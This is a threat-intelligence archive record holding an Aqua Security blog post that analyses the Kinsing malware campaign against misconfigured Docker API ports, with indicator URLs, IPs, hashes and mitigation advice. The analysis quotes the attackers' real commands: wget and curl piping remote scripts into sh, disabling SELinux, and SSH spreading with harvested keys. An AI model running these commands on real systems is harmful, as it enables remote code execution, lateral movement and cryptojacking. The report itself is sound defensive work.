{ "id": "479ced0b-ac3e-4b1a-8d48-cbe5d76ae014", "created_at": "2026-04-06T02:13:12.98241Z", "updated_at": "2026-04-10T03:34:59.753903Z", "deleted_at": null, "sha1_hash": "85170fe111d35c71b73b70820d5eb5b7d95479f3", "title": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1351663, "plain_text": "Threat Alert: Kinsing Malware Attacks Targeting Container\r\nEnvironments\r\nBy Gal Singer\r\nPublished: 2020-04-03 · Archived: 2026-04-06 01:30:47 UTC\r\nLately we’ve been witnessing a rise in the number of attacks that target container environments. We’ve been\r\ntracking an organized attack campaign that targets misconfigured open Docker Daemon API ports. This persistent\r\ncampaign has been going on for months, with thousands of attempts taking place nearly on a daily basis. These are\r\nthe highest numbers we’ve seen in some time, far exceeding what we have witnessed to date. We therefore believe\r\nthat these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and\r\nsustain such attacks, and that this is not an improvised endeavor.\r\nUpdate (8/27/23) – Aqua Nautilus discovered a new campaign that exploits the Openfire vulnerability (CVE-2023-32315 to deploy Kinsing malware and a cryptominer.\r\nThe following graph shows the volume of attacks by day:\r\nIn this attack, the attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing\r\nmalicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers\r\nand hosts. Our analysis of this attack vector exposes the techniques used, starting with exploiting the open port,\r\nthrough evasion tactics and lateral movement, all the way up to the end-goal of deploying the cryptominer.\r\nHow the Attack is Initiated\r\nTaking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu\r\ncontainer with the following entry point:\r\n/bin/bash -c apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh |\r\nsh;tail -f /dev/null\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 1 of 8\n\nWe saw this entry point in every attack in this campaign, with the only change being the IP address that d.sh is\r\ndownloaded from. We witnessed 3 IP addresses used in total–the one in the example above, 217.12.221.244 and\r\n185.92.74.42\r\nThe command does the following:\r\nUpdate packages with apt-get update\r\nInstall wget with apt-get\r\nStart the cron service.\r\nDownload a shell script with the just installed wget\r\nRun the shell script and read indefinitely from /dev/null to keep the container alive and running\r\nWe can see that the wget program was required to download the cron shell script. The script would be later used in\r\norder to gain persistency within the container.\r\nDefense Evasion and Persistence\r\nThe shell script d.sh, referred to from hereon as ‘the shell script’, contains more than 600 lines. We discovered that\r\nthe shell script does the following:\r\n1. Disables security measures and clears logs: echo SELINUX=disabled \u003e/etc/selinux/config\r\n2. Kills numerous applications, notably other malwares and cryptominers.\r\n3. Deletes files related to other malwares/cryptominers, most of them from the /tmp directory\r\n4. Kills running rival malicious Docker containers and deletes their image.\r\n5. Downloads the ‘kinsing’ malware and runs it\r\n6. Uses crontab to download and run the shell script every minute\r\n7. Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its\r\nown. We are not certain why the attackers chose to do so, but that is what the script executes:\r\ncrontab -l | sed ‘/update.sh/d’ | crontab –\r\nRunning the Malware\r\nKinsing is a Linux agent, identified by Virus Total after we submitted it for analysis. From here on we’ll refer to\r\nthe malware as kinsing.\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 2 of 8\n\nA quick look at the malware’s strings reveals that it is a Golang-based Linux agent. It uses several Go libraries,\r\nincluding:\r\ngo-resty – an HTTP and REST client library, used to communicate with a Command and Control (C\u0026C)\r\nserver.\r\ngopsutil – a process utility library, used for system and processes monitoring.\r\nosext – extension to the standard ‘os’ package, used to execute binaries.\r\ndiskv – A disk-backed key-value store, for storage.\r\nRunning the malware in a controlled environment and monitoring it brought up more details about its malicious\r\nactions.\r\nCommunication with C\u0026C servers\r\nBefore the malware proceeded to deploy its payload, it attempted to communicate with servers in Eastern Europe.\r\nIt appears that there are dedicated servers for each function that the malware executes:\r\n1. Attempts to establish a connection with the following IP address: 45.10.88.102. The attempts fail as the\r\nserver does not respond.\r\n2. Connects to 91.215.169.111, which appears to be the main C\u0026C server. The malware communicates with\r\nthat host over HTTP port 80, and sends small encrypted messages on regular intervals, every few seconds.\r\n3. Connects to 217.12.221.244/spre.sh, which we presume stands for spread, as we will see in the next\r\nparagraph, to download a shell script used for lateral movement purposes.\r\n4. Connects to 193.33.87.219 to download the cryptominer C\u0026C communication.\r\nDiscovery and Lateral Movement\r\nThe spre.sh shell script that the malware downloads is used to laterally spread the malware across the container\r\nnetwork.\r\nIn order to discover potential targets and locate the information it needs to authenticate against, the script\r\npassively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 3 of 8\n\nactive scanning techniques used to identify additional targets.\r\nUsing the information gathered, the malware then attempts to connect to each host, using every possible user and\r\nkey combination through SSH, in order to download the aforementioned shell script and run the malware on other\r\nhosts or containers in the network.\r\nThe actual shell script is named spr.sh this time around, but it is identical to the a d.sh shell script used earlier in\r\nthe attack sequence\r\nThe following SSH command was used to spread it throughout the network:\r\nssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp “sudo\r\ncurl -L http://217.12.221.244/spr.sh|sh; sudo wget -q -O – http://217.12.221.244/spr.sh|sh;”\r\nWe noticed a comment in the script for a 20 seconds sleep after every 20 SSH connection attempts, and their\r\ncleanup, possibly indicating that the attackers have some sense of evasion and were trying to hide their activities.\r\nSpre.sh script\r\nAt the last stage of the attack the malware runs a cryptominer called kdevtmpfsi. The cryptominer was identified\r\nby Virus Total as a Bitcoin miner.\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 4 of 8\n\nThe cryptominer connects to a host with the 193.33.87.219 IP address using a log in request over HTTP, receives\r\nfurther instructions, and starts mining cryptocurrency.\r\nThe infographic below illustrates the full flow of the attack:\r\nSummary\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 5 of 8\n\nThis attack stands out as yet another example of the growing threat to cloud native environments. With\r\ndeployments becoming larger and container use on the rise, attackers are upping their game and mounting more\r\nambitious attacks, with an increasing level of sophistication.\r\nHere is a summary of the attack components, mapping each component of the attack to the corresponding\r\nMITREAtt\u0026ck tactics and techniques category:\r\nWe believe that DevSecOps teams must also up their game and become aware of the threats that are lurking in the\r\ncloud, and develop a security strategy to mitigate risks. Here’s a list of steps we’d consider making:\r\n1. Identify all cloud resources and group them by some logical structure.\r\n2. Review authorization and authentication policies, basic security policies, and adjust them according to the\r\nprinciple of least privilege.\r\n3. Scan the images that you use, making sure you are familiar with them and their use, using minimal\r\nprivileges such as avoiding root user and privileged mode. Use Trivy the Open Source vulnerability\r\nscanner.\r\n4. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.\r\n5. Form a security strategy where you can enforce your policies with ease, consider using cloud security tools\r\nthat will widen your scope and reach within your cloud resources.\r\nWe encourage you to block access to the following IOC’s-URL’s:\r\nURL http://142.44.191.122/d.sh\r\nURL http://142.44.191.122/kinsing/\r\nURL http://142.44.191.122/al.sh\r\nURL http://142.44.191.122/cron.sh\r\nURL http://142.44.191.122/\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 6 of 8\n\nURL http://142.44.191.122/d.sh\r\nURL http://142.44.191.122/kinsing\r\nURL http://142.44.191.122/ex.sh\r\nURL http://185.92.74.42/w.sh\r\nURL http://185.92.74.42/d.sh\r\nURL http://217.12.221.244/\r\nURL http://217.12.221.24/d.sh\r\nURL http://217.12.221.244/kinsing\r\nURL http://217.12.221.244/j.sh\r\nURL http://217.12.221.244/t.sh\r\nURL http://217.12.221.244/spr.sh\r\nURL http://217.12.221.244/spre.sh\r\nURL http://217.12.221.244/p.sh\r\nURL http://217.12.221.244/Application.jar\r\nURL http://217.12.221.244/f.sh\r\nURL http://www.traffclick.ru/\r\nURL http://www.mechta-dachnika-tut.ru/\r\nURL http://www.rus-wintrillions-com.ru/\r\nURL http://rus-wintrillions-com.ru/\r\nURL http://stroitelnye-jekologicheskie-materialy2016.ru\r\nURL 45.10.88.102\r\nURL 91.215.169.111\r\nURL 193.33.87.219\r\nMD5s kinsing - 0d3b26a8c65cf25356399cc5936a7210\r\nMD5s kinsing - 6bffa50350be7234071814181277ae79\r\nMD5s kinsing - c4be7a3abc9f180d997dbb93937926ad\r\nMD5s kdevtmpfsi - d9011709dd3da2649ed30bf2be52b99e\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 7 of 8\n\nGal is a Security Researcher at Aqua. As part of the Aqua research team, his work focuses on researching\r\nvulnerabilities in Kubernetes and Networking around the cloud native world. When not at work, he likes going to\r\nmusic concerts and spending time at the beach with his friends.\r\nSource: https://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nhttps://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.aquasec.com/blog/threat-alert-kinsing-malware-container-vulnerability/" ], "report_names": [ "threat-alert-kinsing-malware-container-vulnerability" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775441592, "ts_updated_at": 1775792099, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.pdf", "text": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.txt", "img": "https://archive.orkl.eu/85170fe111d35c71b73b70820d5eb5b7d95479f3.jpg" } }